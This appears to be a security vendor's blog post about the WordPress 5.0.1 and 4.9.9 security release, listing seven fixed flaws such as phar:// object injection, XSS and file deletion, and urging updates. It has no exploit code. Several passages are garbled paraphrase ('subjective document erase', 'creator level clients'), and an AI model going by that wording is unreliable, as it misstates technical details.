Earlier this month, WordPress released WP version 5.0 and it came bundled with numerous feature upgrades. However, this launch also carried along various backward compatibility issues. In addition, previous versions of WP had security bugs that demanded a fix.
For that reason, the officials at WordPress have now rolled out WordPress 5 which mainly caters to WP security vulnerabilities that influence nearly all previous versions until 3.7. Websites running versions in 4.x branch of WP core are influenced by some of the issues as well. WordPress 4.9.9 was rolled out in conjunction with 5.0.1 to take care of the issues of all those users.
There are still no efforts made to exploit these WordPress 5 vulnerabilities in the wild so far, but seeing the number of websites impacted, soon a change will take place. It is commendable how WordPress community really come together to address the issues faced by the users and this is proved by the speed at which they have discovered these issues, reported and eventually fixed them.
This release is not specific to the new WordPress editor introduced in 5.0, but rather a vulnerability that exists as far back as version 3.7.
For details on this release you may reference the official blog post on WordPress.org:
There are some backwards-compatibility breaks in this release. If you are the developer/maintainer of your install, have a look at these developer notes that detail the backwards compatibility breaking changes that were necessary for security reasons:
|1||WordPress <= 5.0 – Authenticated File Delete – Authors could alter meta data to delete files that they weren’t authorized to|
|2||WordPress <= 5.0 – Authenticated Post Type Bypass – authors could create posts of unauthorized post types with specially crafted input|
|3||WordPress <= 5.0 – PHP Object Injection via Meta Data – contributors could craft meta data in a way that resulted in PHP object injection|
|4||WordPress <= 5.0 – Authenticated Cross-Site Scripting (XSS) – contributors could edit new comments from higher-privileged users, potentially leading to a cross-site scripting vulnerability|
|5||WordPress <= 5.0 – Cross-Site Scripting (XSS) that could affect plugins – specially crafted URL inputs could lead to a cross-site scripting vulnerability in some circumstances|
|6||WordPress <= 5.0 – User Activation Screen Search Engine Indexing – user activation screen could be indexed by search engines in some uncommon configurations, leading to exposure of email addresses, and in some rare cases, default generated passwords|
|7||WordPress <= 5.0 – File Upload to XSS on Apache Web Servers – authors on Apache-hosted sites could upload specifically crafted files that bypass MIME verification, leading to a cross-site scripting vulnerability|
Sensitive Data Exposure
It was ascertained, by Team Yoast, that the user activation screen could be indexed through search engines in some uncommon configurations resulting in exposing email addresses and in some cases default generated passwords.
It allow an attacker to access the user activation screen for new users displaying email addresses and passwords using a Google search (not to be confused with the recent Yoast flaw, CVE-2018-19370).
By taking off the activation of key-used in the URL and storing in the value in a cookie instead, WordPress Team has really gone one step ahead in fixing the issue.
PHP Object Injection –
It was also discovered, by Sam Thomas, that the meta data could be molded by the contributors in a manner that bring about PHP object injection. This was similar to the two random file delete vulnerabilities fixed in WordPress 4.9.6. As per this vulnerability, the author is permitted to allocate a random file path to an attachment.
This particular file path uses the phar:// stream wrapper on the attachment (previously loaded) which bring about object injection with the help of a feature of the PHAR file type which stores serialized objects in the metadata of PHAR file.
Privilege Escalation / XSS
It was discovered that the contributors could also make changes in the new comments, from some of the high-privileged users, leading to a cross-site scripting vulnerability. This vulnerability entail a high-level user role, making the probability of extensive exploitation minimum. Officials at WordPress remove <form> tag from their HTML whitelist to fix this particular issue.
It was noticed that the users having author privileges, especially on Apache-hosted websites, can easily upload crafted websites that evade MIME verification. This results in cross-site scripting vulnerability. The author level user requisite makes an improbable target for the attackers.
Probable impact of XSS on some plugins
It was discovered that in some situations URL inputs, made exclusively, could bring about a cross-site scripting vulnerability. In case there is a change in the code in WordPress, it tend to influence wpmu_admin_do_redirect function (not used in WordPress) but there is a probability that a plugin may call this particular function at some place.
Illegitimate Deletion of file
It was found that creator level clients could modify metadata to erase records that they weren’t approved to. This issue comes from the 2 subjective document erase vulnerabilities settled in WordPress 4.9.6.
The particular fix mainly dealt with the way attachment files are deleted through limiting the paths of the file to the upload directory. However, unfortunately it did not address the issue where the authors were able to make alterations in the attachment paths to subjective files. A creator can utilize this to erase connections of other clients.
Unauthorised Posts – RIPS
PHP security company RIPS Technologies discovered that authors could create posts of unauthorized types with specially crafted input.
A second one from RIPS, this time credited to Karim El Ouerghemmi, uncovered a weakness that could allow authors to delete files they weren’t authorised to delete.
Unless your site updates automatically, you can find WordPress 5.0.1 via Dashboard > Updates > Update Now.
What to do
It is important to update all the websites on WordPress 5.0 to 5.0.1 at the earliest possible. Those with automated updates empowered for WordPress core should have already been refreshed, yet given the idea of the vulnerabilities, we suggest you check your websites physically in the event of some unforeseen issue. We have released firewall rules to protect our Premium customers against the vulnerabilities most likely to be exploited. If you need to manually upgrade, the 4.9.9 update can be downloaded here. or you can contact us here.